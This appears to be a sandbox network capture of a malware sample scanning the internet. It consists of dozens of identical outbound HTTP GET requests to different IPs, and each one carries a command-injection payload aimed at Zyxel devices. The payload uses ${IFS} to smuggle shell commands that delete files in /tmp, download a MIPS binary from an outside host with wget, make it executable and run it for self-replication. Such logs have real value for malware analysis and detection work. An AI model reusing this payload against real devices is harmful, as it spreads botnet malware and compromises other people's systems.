                                            Jan 14, 2024 15:50:33.305677891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2442192.168.2.2333860185.53.97.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305701971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2443192.168.2.235074253.187.111.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305742025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2444192.168.2.2343098137.157.105.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305762053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2445192.168.2.2360788206.224.88.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305766106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2446192.168.2.234806899.137.98.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305821896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2447192.168.2.2338548166.109.228.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305852890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2448192.168.2.235467072.203.90.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305901051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2449192.168.2.2342460112.20.68.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305911064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2450192.168.2.2340492211.155.64.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305951118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2451192.168.2.233636288.224.127.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305980921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2452192.168.2.2333692165.236.73.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.305995941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2453192.168.2.2346272160.51.39.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306031942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2454192.168.2.234577463.66.35.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306042910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2455192.168.2.2349990154.194.27.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306086063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2456192.168.2.233444087.68.38.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306118965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2457192.168.2.233682078.154.157.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306138039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2458192.168.2.2337838166.167.66.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306160927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2459192.168.2.2341936105.125.125.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306190014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2460192.168.2.2350118137.199.182.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306219101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2461192.168.2.2344744201.133.191.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306241989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2462192.168.2.234703425.22.217.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306282043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2463192.168.2.236026896.174.165.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306304932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2464192.168.2.2352410101.113.8.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306327105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2465192.168.2.234760065.210.179.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306338072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2466192.168.2.235280047.130.0.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306368113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2467192.168.2.2332856147.54.182.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306391954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2468192.168.2.234395638.255.23.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306421995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2469192.168.2.234884888.54.15.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306441069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2470192.168.2.2343248184.149.82.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306463003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2471192.168.2.2353314111.28.214.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306478024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2472192.168.2.2359104130.127.232.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306510925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2473192.168.2.2335402145.215.40.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306514978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2474192.168.2.2359612209.73.226.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306556940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2475192.168.2.234069223.15.202.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306618929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2476192.168.2.235766695.43.232.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306618929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2477192.168.2.235584023.224.106.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306662083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2478192.168.2.2335534120.164.93.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306684971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2479192.168.2.235442243.209.85.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306699991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2480192.168.2.235273436.183.182.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306761026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2481192.168.2.2333142163.177.163.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306786060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2482192.168.2.2350664202.38.174.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306818962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2483192.168.2.235675071.54.50.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306828022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2484192.168.2.2351702198.187.15.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306862116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2485192.168.2.23467488.200.185.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306921005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2486192.168.2.235999491.71.197.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306921959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2487192.168.2.233537689.36.171.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306932926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2488192.168.2.23530082.235.210.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306946993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2489192.168.2.233706813.33.223.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306957960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2490192.168.2.233373439.45.185.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.306994915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2491192.168.2.2338158170.81.185.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307054043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2492192.168.2.2350960160.88.232.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307065964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2493192.168.2.2347644196.188.197.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307094097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2494192.168.2.233429678.201.67.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307112932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2495192.168.2.234076677.237.237.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307178974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2496192.168.2.2356926100.62.31.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307179928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2497192.168.2.233893627.1.203.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307209969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2498192.168.2.2337872114.2.115.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307234049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2499192.168.2.2341874165.93.211.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307254076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2500192.168.2.2347782203.142.57.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307286978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2501192.168.2.2352810220.233.85.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307312965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2502192.168.2.2347648138.117.183.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307347059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2503192.168.2.235944474.110.107.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.307358980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2504192.168.2.233842086.71.177.227443
                                            TimestampBytes transferredDirectionData
